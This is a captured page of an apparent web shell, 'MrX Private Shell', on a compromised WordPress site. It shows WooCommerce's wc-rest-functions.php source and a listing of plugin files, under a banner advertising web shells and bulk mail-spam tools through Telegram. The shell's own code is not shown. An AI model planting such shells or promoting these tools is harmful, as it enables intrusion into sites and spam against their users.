__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * WooCommerce REST Functions
 *
 * Functions for REST specific things.
 *
 * @package WooCommerce\Functions
 * @version 2.6.0
 */

use Automattic\WooCommerce\Internal\Utilities\Users;

defined( 'ABSPATH' ) || exit;

/**
 * Parses and formats a date for ISO8601/RFC3339.
 *
 * Required WP 4.4 or later.
 * See https://developer.wordpress.org/reference/functions/mysql_to_rfc3339/
 *
 * @since  2.6.0
 * @param  string|null|WC_DateTime $date Date.
 * @param  bool                    $utc  Send false to get local/offset time.
 * @return string|null ISO8601/RFC3339 formatted datetime.
 */
function wc_rest_prepare_date_response( $date, $utc = true ) {
	if ( is_numeric( $date ) ) {
		$date = new WC_DateTime( "@$date", new DateTimeZone( 'UTC' ) );
		$date->setTimezone( new DateTimeZone( wc_timezone_string() ) );
	} elseif ( is_string( $date ) ) {
		$date = new WC_DateTime( $date, new DateTimeZone( 'UTC' ) );
		$date->setTimezone( new DateTimeZone( wc_timezone_string() ) );
	}

	if ( ! is_a( $date, 'WC_DateTime' ) ) {
		return null;
	}

	// Get timestamp before changing timezone to UTC.
	return gmdate( 'Y-m-d\TH:i:s', $utc ? $date->getTimestamp() : $date->getOffsetTimestamp() );
}

/**
 * Returns image mime types users are allowed to upload via the API.
 *
 * @since  2.6.4
 * @return array
 */
function wc_rest_allowed_image_mime_types() {
	return apply_filters(
		'woocommerce_rest_allowed_image_mime_types',
		array(
			'jpg|jpeg|jpe' => 'image/jpeg',
			'gif'          => 'image/gif',
			'png'          => 'image/png',
			'bmp'          => 'image/bmp',
			'tiff|tif'     => 'image/tiff',
			'ico'          => 'image/x-icon',
			'webp'         => 'image/webp',
		)
	);
}

/**
 * Upload image from URL.
 *
 * @since 2.6.0
 * @param string $image_url Image URL.
 * @return array|WP_Error Attachment data or error message.
 */
function wc_rest_upload_image_from_url( $image_url ) {
	$parsed_url = wp_parse_url( $image_url );

	// Check parsed URL.
	if ( ! $parsed_url || ! is_array( $parsed_url ) ) {
		/* translators: %s: image URL */
		return new WP_Error( 'woocommerce_rest_invalid_image_url', sprintf( __( 'Invalid URL %s.', 'woocommerce' ), $image_url ), array( 'status' => 400 ) );
	}

	// Ensure url is valid.
	$image_url = esc_url_raw( $image_url );

	// download_url function is part of wp-admin.
	if ( ! function_exists( 'download_url' ) ) {
		include_once ABSPATH . 'wp-admin/includes/file.php';
	}

	$file_array         = array();
	$file_array['name'] = basename( current( explode( '?', $image_url ) ) );

	// Download file to temp location.
	$file_array['tmp_name'] = download_url( $image_url );

	// If error storing temporarily, return the error.
	if ( is_wp_error( $file_array['tmp_name'] ) ) {
		return new WP_Error(
			'woocommerce_rest_invalid_remote_image_url',
			/* translators: %s: image URL */
			sprintf( __( 'Error getting remote image %s.', 'woocommerce' ), $image_url ) . ' '
			/* translators: %s: error message */
			. sprintf( __( 'Error: %s', 'woocommerce' ), $file_array['tmp_name']->get_error_message() ),
			array( 'status' => 400 )
		);
	}

	// Do the validation and storage stuff.
	$file = wp_handle_sideload(
		$file_array,
		array(
			'test_form' => false,
			'mimes'     => wc_rest_allowed_image_mime_types(),
		),
		current_time( 'Y/m' )
	);

	if ( isset( $file['error'] ) ) {
		@unlink( $file_array['tmp_name'] ); // @codingStandardsIgnoreLine.

		/* translators: %s: error message */
		return new WP_Error( 'woocommerce_rest_invalid_image', sprintf( __( 'Invalid image: %s', 'woocommerce' ), $file['error'] ), array( 'status' => 400 ) );
	}

	do_action( 'woocommerce_rest_api_uploaded_image_from_url', $file, $image_url );

	return $file;
}

/**
 * Set uploaded image as attachment.
 *
 * @since 2.6.0
 * @param array $upload Upload information from wp_upload_bits.
 * @param int   $id Post ID. Default to 0.
 * @return int Attachment ID
 */
function wc_rest_set_uploaded_image_as_attachment( $upload, $id = 0 ) {
	$info    = wp_check_filetype( $upload['file'] );
	$title   = '';
	$content = '';

	if ( ! function_exists( 'wp_generate_attachment_metadata' ) ) {
		include_once ABSPATH . 'wp-admin/includes/image.php';
	}

	$image_meta = @wp_read_image_metadata( $upload['file'] );
	if ( $image_meta ) {
		if ( trim( $image_meta['title'] ) && ! is_numeric( sanitize_title( $image_meta['title'] ) ) ) {
			$title = wc_clean( $image_meta['title'] );
		}
		if ( trim( $image_meta['caption'] ) ) {
			$content = wc_clean( $image_meta['caption'] );
		}
	}

	$attachment = array(
		'post_mime_type' => $info['type'],
		'guid'           => $upload['url'],
		'post_parent'    => $id,
		'post_title'     => $title ? $title : basename( $upload['file'] ),
		'post_content'   => $content,
	);

	$attachment_id = wp_insert_attachment( $attachment, $upload['file'], $id );
	if ( ! is_wp_error( $attachment_id ) ) {
		@wp_update_attachment_metadata( $attachment_id, wp_generate_attachment_metadata( $attachment_id, $upload['file'] ) );
	}

	return $attachment_id;
}

/**
 * Validate reports request arguments.
 *
 * @since 2.6.0
 * @param mixed           $value   Value to validate.
 * @param WP_REST_Request $request Request instance.
 * @param string          $param   Param to validate.
 * @return WP_Error|boolean
 */
function wc_rest_validate_reports_request_arg( $value, $request, $param ) {

	$attributes = $request->get_attributes();
	if ( ! isset( $attributes['args'][ $param ] ) || ! is_array( $attributes['args'][ $param ] ) ) {
		return true;
	}
	$args = $attributes['args'][ $param ];

	if ( 'string' === $args['type'] && ! is_string( $value ) ) {
		/* translators: 1: param 2: type */
		return new WP_Error( 'woocommerce_rest_invalid_param', sprintf( __( '%1$s is not of type %2$s', 'woocommerce' ), $param, 'string' ) );
	}

	if ( 'date' === $args['format'] ) {
		$regex = '#^\d{4}-\d{2}-\d{2}$#';

		if ( ! preg_match( $regex, $value, $matches ) ) {
			return new WP_Error( 'woocommerce_rest_invalid_date', __( 'The date you provided is invalid.', 'woocommerce' ) );
		}
	}

	return true;
}

/**
 * Encodes a value according to RFC 3986.
 * Supports multidimensional arrays.
 *
 * @since 2.6.0
 * @param string|array $value The value to encode.
 * @return string|array       Encoded values.
 */
function wc_rest_urlencode_rfc3986( $value ) {
	if ( is_array( $value ) ) {
		return array_map( 'wc_rest_urlencode_rfc3986', $value );
	}

	return str_replace( array( '+', '%7E' ), array( ' ', '~' ), rawurlencode( $value ) );
}

/**
 * Check permissions of posts on REST API.
 *
 * @since 2.6.0
 * @param string $post_type Post type.
 * @param string $context   Request context.
 * @param int    $object_id Post ID.
 * @return bool
 */
function wc_rest_check_post_permissions( $post_type, $context = 'read', $object_id = 0 ) {
	$contexts = array(
		'read'   => 'read_private_posts',
		'create' => 'publish_posts',
		'edit'   => 'edit_post',
		'delete' => 'delete_post',
		'batch'  => 'edit_others_posts',
	);

	if ( 'revision' === $post_type ) {
		$permission = false;
	} else {
		$cap              = $contexts[ $context ];
		$post_type_object = get_post_type_object( $post_type );
		$permission       = false;
		if ( $post_type_object instanceof WP_Post_Type ) {
			$permission = current_user_can( $post_type_object->cap->$cap, $object_id );
		}
	}

	return apply_filters( 'woocommerce_rest_check_permissions', $permission, $context, $object_id, $post_type );
}

/**
 * Check permissions of users on REST API.
 *
 * @since 2.6.0
 * @since 9.4.0 Became multisite aware. The function now considers whether the user belongs to the current site.
 *
 * @param string $context   Request context.
 * @param int    $object_id User ID.
 * @return bool
 */
function wc_rest_check_user_permissions( $context = 'read', $object_id = 0 ) {
	$contexts = array(
		'read'   => 'list_users',
		'create' => 'create_customers',
		'edit'   => 'edit_users',
		'delete' => 'delete_users',
		'batch'  => 'promote_users',
	);

	// Check to allow shop_managers to manage only customers.
	if ( in_array( $context, array( 'edit', 'delete' ), true ) && wc_current_user_has_role( 'shop_manager' ) ) {
		$permission                  = false;
		$user_data                   = get_userdata( $object_id );
		$shop_manager_editable_roles = apply_filters( 'woocommerce_shop_manager_editable_roles', array( 'customer' ) );

		if ( isset( $user_data->roles ) ) {
			$can_manage_users = array_intersect( $user_data->roles, array_unique( $shop_manager_editable_roles ) );

			// Check if Shop Manager can edit customer or with the is same shop manager.
			if ( 0 < count( $can_manage_users ) || intval( $object_id ) === intval( get_current_user_id() ) ) {
				$permission = current_user_can( $contexts[ $context ], $object_id );
			}
		}
	} else {
		$permission = current_user_can( $contexts[ $context ], $object_id );
	}

	// Possibly revoke $permission if the user is 'out of bounds' from a multisite-network perspective.
	if ( $permission && ! Users::get_user_in_current_site( $object_id ) ) {
		$permission = false;
	}

	/**
	 * Provides an opportunity to override the permission check made before acting on an object in relation to
	 * REST API requests.
	 *
	 * @since 2.6.0
	 *
	 * @param bool   $permission  If we have permission to act on this object.
	 * @param string $context     Describes the operation being performed: 'read', 'edit', 'delete', etc.
	 * @param int    $object_id   Object ID. This could be a user ID, order ID, post ID, etc.
	 * @param string $object_type Type of object ('user', 'shop_order', etc) for which checks are being made.
	 */
	return apply_filters( 'woocommerce_rest_check_permissions', $permission, $context, $object_id, 'user' );
}

/**
 * Check permissions of product terms on REST API.
 *
 * @since 2.6.0
 * @param string $taxonomy  Taxonomy.
 * @param string $context   Request context.
 * @param int    $object_id Post ID.
 * @return bool
 */
function wc_rest_check_product_term_permissions( $taxonomy, $context = 'read', $object_id = 0 ) {
	$contexts = array(
		'read'   => 'manage_terms',
		'create' => 'edit_terms',
		'edit'   => 'edit_terms',
		'delete' => 'delete_terms',
		'batch'  => 'edit_terms',
	);

	$cap             = $contexts[ $context ];
	$taxonomy_object = get_taxonomy( $taxonomy );
	$permission      = current_user_can( $taxonomy_object->cap->$cap, $object_id );

	return apply_filters( 'woocommerce_rest_check_permissions', $permission, $context, $object_id, $taxonomy );
}

/**
 * Check manager permissions on REST API.
 *
 * @since 2.6.0
 * @param string $object  Object.
 * @param string $context Request context.
 * @return bool
 */
function wc_rest_check_manager_permissions( $object, $context = 'read' ) {
	$objects = array(
		'reports'          => 'view_woocommerce_reports',
		'settings'         => 'manage_woocommerce',
		'system_status'    => 'manage_woocommerce',
		'attributes'       => 'manage_product_terms',
		'shipping_methods' => 'manage_woocommerce',
		'payment_gateways' => 'manage_woocommerce',
		'webhooks'         => 'manage_woocommerce',
	);

	$permission = current_user_can( $objects[ $object ] );

	return apply_filters( 'woocommerce_rest_check_permissions', $permission, $context, 0, $object );
}

/**
 * Check product reviews permissions on REST API.
 *
 * @since 3.5.0
 * @param string $context   Request context.
 * @param string $object_id Object ID.
 * @return bool
 */
function wc_rest_check_product_reviews_permissions( $context = 'read', $object_id = 0 ) {
	$permission = false;
	$contexts   = array(
		'read'   => 'moderate_comments',
		'create' => 'edit_products',
		'edit'   => 'edit_products',
		'delete' => 'edit_products',
		'batch'  => 'edit_products',
	);

	if ( $object_id > 0 ) {
		$object = get_comment( $object_id );

		if ( ! is_a( $object, 'WP_Comment' ) || get_comment_type( $object ) !== 'review' ) {
			return false;
		}
	}

	if ( isset( $contexts[ $context ] ) ) {
		$permission = current_user_can( $contexts[ $context ], $object_id );
	}

	return apply_filters( 'woocommerce_rest_check_permissions', $permission, $context, $object_id, 'product_review' );
}

/**
 * Returns true if the current REST request is from the product editor.
 *
 * @since 8.9.0
 * @return bool
 */
function wc_rest_is_from_product_editor() {
	return isset( $_SERVER['HTTP_X_WC_FROM_PRODUCT_EDITOR'] ) && '1' === $_SERVER['HTTP_X_WC_FROM_PRODUCT_EDITOR'];
}

/**
 * Check if a REST namespace should be loaded. Useful to maintain site performance even when lots of REST namespaces are registered.
 *
 * @since 9.2.0.
 *
 * @param string $ns The namespace to check.
 * @param string $rest_route (Optional) The REST route being checked.
 *
 * @return bool True if the namespace should be loaded, false otherwise.
 */
function wc_rest_should_load_namespace( string $ns, string $rest_route = '' ): bool {
	if ( '' === $rest_route ) {
		$rest_route = $GLOBALS['wp']->query_vars['rest_route'] ?? '';
	}

	if ( '' === $rest_route ) {
		return true;
	}

	$rest_route = trailingslashit( ltrim( $rest_route, '/' ) );
	$ns         = trailingslashit( $ns );

	/**
	 * Known namespaces that we know are safe to not load if the request is not for them. Namespaces not in this namespace should always be loaded, because we don't know if they won't be making another internal REST request to an unloaded namespace.
	 */
	$known_namespaces = array(
		'wc/v1',
		'wc/v2',
		'wc/v3',
		'wc/v4',
		'wc-telemetry',
		'wc-admin',
		'wc-analytics',
		'wc/store',
		'wc/private',
	);

	$known_namespace_request = false;
	foreach ( $known_namespaces as $known_namespace ) {
		if ( str_starts_with( $rest_route, $known_namespace ) ) {
			$known_namespace_request = true;
			break;
		}
	}

	if ( ! $known_namespace_request ) {
		return true;
	}

	/**
	 * Filters whether a namespace should be loaded.
	 *
	 * @param bool   $should_load True if the namespace should be loaded, false otherwise.
	 * @param string $ns          The namespace to check.
	 * @param string $rest_route  The REST route being checked.
	 * @param array  $known_namespaces Known namespaces that we know are safe to not load if the request is not for them.
	 *
	 * @since 9.4
	 */
	return apply_filters( 'wc_rest_should_load_namespace', str_starts_with( $rest_route, $ns ), $ns, $rest_route, $known_namespaces );
}

Filemanager

Name Type Size Permission Actions
abstracts Folder 0775
admin Folder 0775
blocks Folder 0775
cli Folder 0775
customizer Folder 0775
data-stores Folder 0775
emails Folder 0775
export Folder 0775
gateways Folder 0775
import Folder 0775
integrations Folder 0775
interfaces Folder 0775
legacy Folder 0775
libraries Folder 0775
log-handlers Folder 0775
payment-tokens Folder 0775
product-usage Folder 0775
queue Folder 0775
react-admin Folder 0775
rest-api Folder 0775
shipping Folder 0775
shortcodes Folder 0775
theme-support Folder 0775
tracks Folder 0775
traits Folder 0775
walkers Folder 0775
wccom-site Folder 0775
widgets Folder 0775
class-wc-ajax.php File 120.02 KB 0664
class-wc-auth.php File 12.69 KB 0664
class-wc-autoloader.php File 5.27 KB 0664
class-wc-background-emailer.php File 4.58 KB 0664
class-wc-background-updater.php File 3.45 KB 0664
class-wc-brands-brand-settings-manager.php File 1.78 KB 0664
class-wc-brands-coupons.php File 6.89 KB 0664
class-wc-brands.php File 35.13 KB 0664
class-wc-breadcrumb.php File 9.49 KB 0664
class-wc-cache-helper.php File 12.69 KB 0664
class-wc-cart-fees.php File 3.37 KB 0664
class-wc-cart-session.php File 23.34 KB 0664
class-wc-cart-totals.php File 28.48 KB 0664
class-wc-cart.php File 71.24 KB 0664
class-wc-checkout.php File 50.15 KB 0664
class-wc-cli.php File 3.34 KB 0664
class-wc-comments.php File 22.63 KB 0664
class-wc-countries.php File 50.01 KB 0664
class-wc-coupon.php File 40.95 KB 0664
class-wc-customer-download-log.php File 3.37 KB 0664
class-wc-customer-download.php File 10.34 KB 0664
class-wc-customer.php File 32.54 KB 0664
class-wc-data-exception.php File 1.29 KB 0664
class-wc-data-store.php File 6.59 KB 0664
class-wc-datetime.php File 2.26 KB 0664
class-wc-deprecated-action-hooks.php File 6.59 KB 0664
class-wc-deprecated-filter-hooks.php File 7.34 KB 0664
class-wc-discounts.php File 36.64 KB 0664
class-wc-download-handler.php File 28.37 KB 0664
class-wc-emails.php File 38.15 KB 0664
class-wc-embed.php File 4.24 KB 0664
class-wc-form-handler.php File 46.5 KB 0664
class-wc-frontend-scripts.php File 32.62 KB 0664
class-wc-geo-ip.php File 30.43 KB 0664
class-wc-geolite-integration.php File 1.99 KB 0664
class-wc-geolocation.php File 11.32 KB 0664
class-wc-https.php File 4.33 KB 0664
class-wc-install.php File 112.39 KB 0664
class-wc-integrations.php File 1.28 KB 0664
class-wc-log-levels.php File 3.9 KB 0664
class-wc-logger.php File 9.38 KB 0664
class-wc-meta-data.php File 2.21 KB 0664
class-wc-order-factory.php File 8.52 KB 0664
class-wc-order-item-coupon.php File 4.08 KB 0664
class-wc-order-item-fee.php File 9.21 KB 0664
class-wc-order-item-meta.php File 5.8 KB 0664
class-wc-order-item-product.php File 16.15 KB 0664
class-wc-order-item-shipping.php File 8.8 KB 0664
class-wc-order-item-tax.php File 6.49 KB 0664
class-wc-order-item.php File 19.93 KB 0664
class-wc-order-query.php File 2.55 KB 0664
class-wc-order-refund.php File 5.99 KB 0664
class-wc-order.php File 76.82 KB 0664
class-wc-payment-gateways.php File 15.58 KB 0664
class-wc-payment-tokens.php File 6.24 KB 0664
class-wc-post-data.php File 36.24 KB 0664
class-wc-post-types.php File 32 KB 0664
class-wc-privacy-background-process.php File 1.79 KB 0664
class-wc-privacy-erasers.php File 13.61 KB 0664
class-wc-privacy-exporters.php File 14.69 KB 0664
class-wc-privacy.php File 17.22 KB 0664
class-wc-product-attribute.php File 6.97 KB 0664
class-wc-product-download.php File 12.25 KB 0664
class-wc-product-external.php File 4.98 KB 0664
class-wc-product-factory.php File 3.88 KB 0664
class-wc-product-grouped.php File 6.53 KB 0664
class-wc-product-query.php File 2.28 KB 0664
class-wc-product-simple.php File 2.7 KB 0664
class-wc-product-variable.php File 22.41 KB 0664
class-wc-product-variation.php File 20.18 KB 0664
class-wc-query.php File 33.5 KB 0664
class-wc-rate-limiter.php File 4 KB 0664
class-wc-regenerate-images-request.php File 7.74 KB 0664
class-wc-regenerate-images.php File 15.44 KB 0664
class-wc-register-wp-admin-settings.php File 5.05 KB 0664
class-wc-rest-authentication.php File 21.55 KB 0664
class-wc-rest-exception.php File 276 B 0664
class-wc-session-handler.php File 24.15 KB 0664
class-wc-shipping-rate.php File 9.34 KB 0664
class-wc-shipping-zone.php File 13.08 KB 0664
class-wc-shipping-zones.php File 5 KB 0664
class-wc-shipping.php File 12.85 KB 0664
class-wc-shortcodes.php File 18.82 KB 0664
class-wc-structured-data.php File 23.76 KB 0664
class-wc-tax.php File 38.31 KB 0664
class-wc-template-loader.php File 20.42 KB 0664
class-wc-tracker.php File 51.5 KB 0664
class-wc-validation.php File 5.79 KB 0664
class-wc-webhook.php File 30.08 KB 0664
class-woocommerce.php File 60.3 KB 0664
wc-account-functions.php File 14.15 KB 0664
wc-attribute-functions.php File 21.85 KB 0664
wc-brands-functions.php File 4.17 KB 0664
wc-cart-functions.php File 21.05 KB 0664
wc-conditional-functions.php File 15.53 KB 0664
wc-core-functions.php File 86.83 KB 0664
wc-coupon-functions.php File 5.55 KB 0664
wc-deprecated-functions.php File 38.12 KB 0664
wc-formatting-functions.php File 49.9 KB 0664
wc-notice-functions.php File 8.08 KB 0664
wc-order-functions.php File 42.94 KB 0664
wc-order-item-functions.php File 5.03 KB 0664
wc-order-step-logger-functions.php File 5.92 KB 0664
wc-page-functions.php File 9.43 KB 0664
wc-product-functions.php File 57.71 KB 0664
wc-rest-functions.php File 13.93 KB 0664
wc-stock-functions.php File 17.43 KB 0664
wc-template-functions.php File 138.38 KB 0664
wc-template-hooks.php File 12.84 KB 0664
wc-term-functions.php File 24.57 KB 0664
wc-update-functions.php File 95.92 KB 0664
wc-user-functions.php File 34.17 KB 0664
wc-webhook-functions.php File 5.77 KB 0664
wc-widget-functions.php File 2.01 KB 0664
Filemanager